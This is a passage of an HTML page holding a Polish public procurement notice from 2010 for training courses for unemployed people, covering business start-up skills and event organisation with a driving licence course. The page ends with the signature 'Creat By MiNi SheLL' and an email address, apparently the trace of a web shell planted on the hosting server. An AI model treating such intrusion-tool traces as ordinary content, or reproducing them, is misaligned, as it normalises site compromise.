2. Termin rozpoczęcia szkolenia: dla pierwszej grupy - maj 2010r.; dla drugiej grupy -  czerwiec 2010r.; dla trzeciej grupy - lipiec 2010r.; 
dla czwartej grupy - sierpień 2010r.; dla piątej grupy -  wrzesień 2010r.; 
dla szóstej grupy - październik 2010r.; dla siódmej grupy 
- listopad 2010r.; dla ósmej grupy - grudzień 2010r.
3. Wymagana ilość godzin szkolenia: 100 godz. szkolenia na jednego uczestnika (łącznie z egzaminem wewnętrznym), w tym: 50 godz. teorii oraz  50 godz. praktyki.  
4. Zakres szkolenia: formalno - prawne podstawy zakładania 
i prowadzenia własnej firmy; finansowe aspekty prowadzenia działalności gospodarczej, marketing i promocja firmy; profesjonalna obsługa klienta oraz techniki sprzedaży, negocjacje, sporządzanie biznes planu; zatrudnienie pracowników, otoczenie biznesowe w zakresie działania 
i prowadzenia działalności gospodarczej, zasady pozyskiwania dotacji 
z Funduszy Unii Europejskiej.
5. Charakterystyka osób, dla których szkolenie jest przeznaczone: szkolenia przeznaczone są dla osób bezrobotnych i poszukujących pracy, które posiadają wykształcenie min. podstawowe, chcą zdobyć umiejętności zawodowe oraz dla osób, które zamierzają uzupełnić wiadomości i umiejętności zawodowe i chcą rozpocząć własną działalność gospodarczą.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Kwalifikacje kadry dydaktycznej - 35</li>
<li>3. Certyfikat jakości usług - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Profesjonalna organizacja i obsługa imprez okolicznościowych z kursem przygotowującym 
do egzaminu państwowego na prawo jazdy kat. B, treningiem umiejętności interpersonalnych oraz elementami przedsiębiorczości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Szkolenie dla 1 grupy 15 osobowej. 
2. Termin rozpoczęcia szkolenia: wrzesień 2010r.
3. Wymagana ilość godzin szkolenia: 361 godz. szkolenia na 1 uczestnika (łącznie 
z egzaminami wewnętrznymi), w tym: 80 godz. teorii + 20 godz. treningu umiejętności interpersonalnych  + 20 godz. elementów przedsiębiorczości oraz 180 godz. praktyki + prawo jazdy kat. B (teoria 30 godz., praktyka 30 godz., egzamin wewnętrzny teoretyczny i praktyczny - 1 godz.).  
4. Zakres szkolenia: rodzaje przyjęć i zasady ich planowania, zarządzanie czasem, savoir - vivre gościa i gospodarza, savoir - vivre przy jedzeniu, dobór szkła na przyjęcie, pomysły na nakrycie stołu, zaproszenia, dekoracja sal i kościołów, zasady żywienia, technologia żywienia, zasady przygotowywania i dekorowania potraw, zajęcia praktyczne, trening umiejętności interpersonalnych, elementy przedsiębiorczości, prawo jazdy kat. B.
5. Charakterystyka osób, dla których szkolenie jest przeznaczone: szkolenie przeznaczone jest dla osób bezrobotnych i poszukujących pracy, które posiadają wykształcenie min. zasadnicze zawodowe, zamierzają zdobyć lub uzupełnić wiadomości i umiejętności zawodowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Kwalifikacje kadry dydaktycznej - 35</li>
<li>3. Certyfikat jakości usług - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com